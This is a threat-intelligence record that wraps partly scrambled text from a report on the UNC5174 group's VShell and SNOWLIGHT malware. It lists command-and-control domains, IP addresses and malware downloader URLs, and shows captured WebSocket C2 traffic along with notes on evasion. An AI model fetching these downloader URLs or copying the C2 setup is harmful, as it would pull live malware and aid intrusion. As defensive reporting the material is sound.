btt[.]evil[.]gooogleasia[.]com\r\nIdentified\r\nsubdomain\r\nIP\r\nAddress\r\n34[.]150[.]33[.]237\r\nHosted\r\ngooogleasia[.]com\r\nIP\r\nAddress\r\n34[.]96[.]169[.]109\r\nHosted\r\ngooogleasia[.]com\r\nIP\r\nAddress\r\n34[.]92[.]255[.]51\r\nHosted\r\ngooogleasia[.]com\r\nIP\r\nAddress\r\n34[.]131[.]20[.]34\r\nHosted\r\ngooogleasia[.]com\r\nIP\r\nAddress\r\n34[.]131[.]242[.]33\r\nHosted\r\ngooogleasia[.]com\r\nIP\r\nAddress\r\n34[.]126[.]97[.]166\r\nHosted\r\ngooogleasia[.]com\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 22 of 23\n\nDomain mtls[.]sex666vr[.]com Sliver C2\r\nDomain wg[.]gooogleasia[.]com Sliver C2\r\nDomain https[.]sex666vr[.]com Sliver C2\r\nDomain samsungcdn[.]com Previous C2\r\nURL http://47[.]97[.]176[.]108:8887/?a=l64\u0026h=47.97.176.108\u0026t=ws_\u0026p=8887\r\nVShell\r\nDownloader\r\nURL\r\nhttp://images.windowstimes[.]online/?\r\na=l64\u0026h=images.windowstimes[.]online\u0026t=ws_\u0026p=80\r\nVShell\r\nDownloader\r\nDomain start[.]bootstrapcdn[.]fun Previous C2\r\nDomain mcafeecdn[.]xyz Previous C2\r\nURL http://124[.]221[.]120[.]25:2222/vs666\r\nSNOWLIGHT\r\nDownloader\r\nDomain chmobank[.]com Previous C2\r\nURL\r\nhttp://lin[.]huionepay[.]me:2086/?\r\na=l64\u0026h=lin.huionepay.me\u0026t=ws_\u0026p=2086\r\nOngoing\r\ncampaign –\r\nSNOWLIGHT\r\nDownloader\r\nURL\r\nhttp://lin[.]telegrams[.]icu:2086/?\r\na=l64\u0026h=lin.telegrams.icu\u0026t=ws_\u0026p=2086\r\nOngoing\r\ncampaign –\r\nSNOWLIGHT\r\nDownloader\r\nURL\r\nhttp://lin[.]c1oudf1are[.]com:42323/?\r\na=l64\u0026h=lin.c1oudf1are.com\u0026t=ws_\u0026p=42323\r\nOngoing\r\ncampaign –\r\nSNOWLIGHT\r\nDownloader\r\nThreat Research\r\nfeatured resources\r\nTest drive the right way to defend the cloudwith a security expert\r\nSource: https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nhttps://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\nPage 23 of 23\n\nvs[.]gooogleasia[.]com TCP connection and use less on port 8443. WebSockets overhead for provide file uploads and a two-way downloads communication since it is real channel over time. a single\n11949 16:09:03.107155929  1 4 (12202.12202) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443 \n11963 16:09:03.297903241 1 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\n12437 16:09:04.387602087 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443.. \n12515 16:09:04.576754849 1 4 (12202.12213) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\n12871 16:09:05.345517369 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443.. \n12939 16:09:05.536259167 0 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\nThe choice of WebSockets for C2 is not new, but it is not a typical choice for malware either. Over the years, there\nhave been a few reports documenting malware that uses WebSockets for C2 communications, such as\nPY#RATION. WebSocket C2s are more tedious for attackers to configure compared with standard methods, and\nthey typically run on port 80 or 443.     \nIn this case, the attackers have configured VShell to run on the HTTPS port (8443). This is significant because\nHTTPS traffic is encrypted. Our runtime capture confirms that, except for a few random words, we found nothing\nof note in the network traffic once the connection was upgraded to a WebSocket.   \nGiven that the infected hosts are managed through a UI (as shown below), it is likely that UNC5174 prefers\nWebSockets because the payloads can be sent to the compromised machine in real-time and over encrypted traffic.\nThere have been a few reports over the years of antivirus solutions missing malware C2 communication over\nWebSockets, so it is also possible that the threat actor is trying to use a less common C2 channel for defense\nevasion purposes.       \n   Page 18 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/"
	],
	"report_names": [
		"unc5174-chinese-threat-actor-vshell"
	],
	"threat_actors": [
		{
			"id": "b302cfdb-30c9-4dce-a968-d2398dda820d",
			"created_at": "2024-03-28T02:00:05.789775Z",
			"updated_at": "2026-04-10T02:00:03.611467Z",
			"deleted_at": null,
			"main_name": "UNC5174",
			"aliases": [
				"Uteus"
			],
			"source_name": "MISPGALAXY:UNC5174",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132",
			"created_at": "2025-11-01T02:04:53.050049Z",
			"updated_at": "2026-04-10T02:00:03.774442Z",
			"deleted_at": null,
			"main_name": "BRONZE SNOWDROP",
			"aliases": [
				"UNC5174 "
			],
			"source_name": "Secureworks:BRONZE SNOWDROP",
			"tools": [
				"Metasploit",
				"SNOWLIGHT",
				"SUPERSHELL",
				"Sliver",
				"VShell"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775438946,
	"ts_updated_at": 1775792067,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f8f9491935097347510437ef3e902047de95b01.pdf",
		"text": "https://archive.orkl.eu/4f8f9491935097347510437ef3e902047de95b01.txt",
		"img": "https://archive.orkl.eu/4f8f9491935097347510437ef3e902047de95b01.jpg"
	}
}